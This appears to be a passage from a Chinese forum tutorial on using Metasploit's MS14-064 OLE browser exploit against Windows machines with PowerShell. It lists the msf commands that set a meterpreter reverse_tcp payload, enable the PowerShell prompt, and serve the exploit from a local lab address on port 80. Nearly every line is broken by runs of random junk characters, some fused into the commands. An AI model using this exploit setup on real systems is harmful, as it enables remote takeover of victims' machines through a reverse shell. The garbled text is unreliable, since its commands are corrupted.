( _; b2 g! d" d 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
; v. c% s3 `0 ^# x
3 m! S1 D+ m. I; t: @8 x# M
. V4 s9 @' ^$ L4 K5 l
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
, a0 H4 r2 c3 O M; t9 C
1 R+ q- `: X- k6 g! W1 G s6 S" U; q& D+ d" |# b. \
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp$ W4 T3 _& ^9 q, e" N/ C
1 V+ D* ~- p4 p: m7 u! t1 f
. X7 A- Y+ U( [: Z; M( G set AllowPowershellPrompt true. W# ~+ s. v; D8 | Y6 I+ p
: @" J6 g( \, s3 \8 b* G
6 |3 Y5 \. }; F3 y+ T# U+ O Set LHOST 192.168.0.1091 q( n; x* L0 F2 W, i& E
$ K, F2 A" Q% a: O* t. N; a7 q9 `3 f
+ Q8 P+ B4 x0 H$ C set SRVHOST 192.168.0.109: {! i. D. B. d9 e$ t: g+ t" \
0 e# M8 W1 d+ w2 h; K
7 W3 S8 [$ v& ]; J5 R: P Set uripath share, L O0 a( f( f; i6 ]
# _% N4 ?, G& E7 o' u; N2 }, x8 a- h2 F2 ]) y4 s
Set srvport 80, h+ R3 _8 o: X$ ?0 P6 j
& V9 B# N$ _! r# M2 i* T5 T( C! B* Q! U. b$ F3 R, M
. R0 t+ r9 M+ R5 c9 Q( \
) K o! p; |& ]4 {' [
' X7 Y+ |$ r8 L
" K, ?5 v" l5 v3 `
9 a) c$ g; ^8 h9 ]
& c) [8 y( p: c N' [ 9 R: G# [; X& V/ o* y4 n2 ^ f
7 p0 u1 L' e* y/ ?/ C
/ f# y% [- p9 o' E4 p. V7 x
9 e0 t$ u: r. b' ?" s3 G4 X
. @" B& F1 ]1 s9 \& e1 K# L
1 a- o* S* |; z9 |# U$ m+ J, f2 B ) V3 Q! V9 e& L% I: B" C5 t5 i
; E- k9 x r9 Y( n' N" p7 i: M- t/ t4 c( H# d N
下面我们来访问本地地址如图:; j& w3 K: p1 E: Z3 T
# g4 d8 T, @* I, P+ g9 \
. V! L$ X$ q( I, L& E) k! S* q" g 2 i e! B( \% G% _" O; E+ A
1 q. r- L2 w$ R. J/ Q2 s
" T' K4 j2 p1 S) h6 P$ E+ l ' T5 ], a8 g7 u8 _* X
: x2 |8 Q+ \7 H- [. {& G6 ^
, ~ ]0 Y0 _+ V% D1 k
/ \ o1 Y8 m# Q0 Y; V0 A. K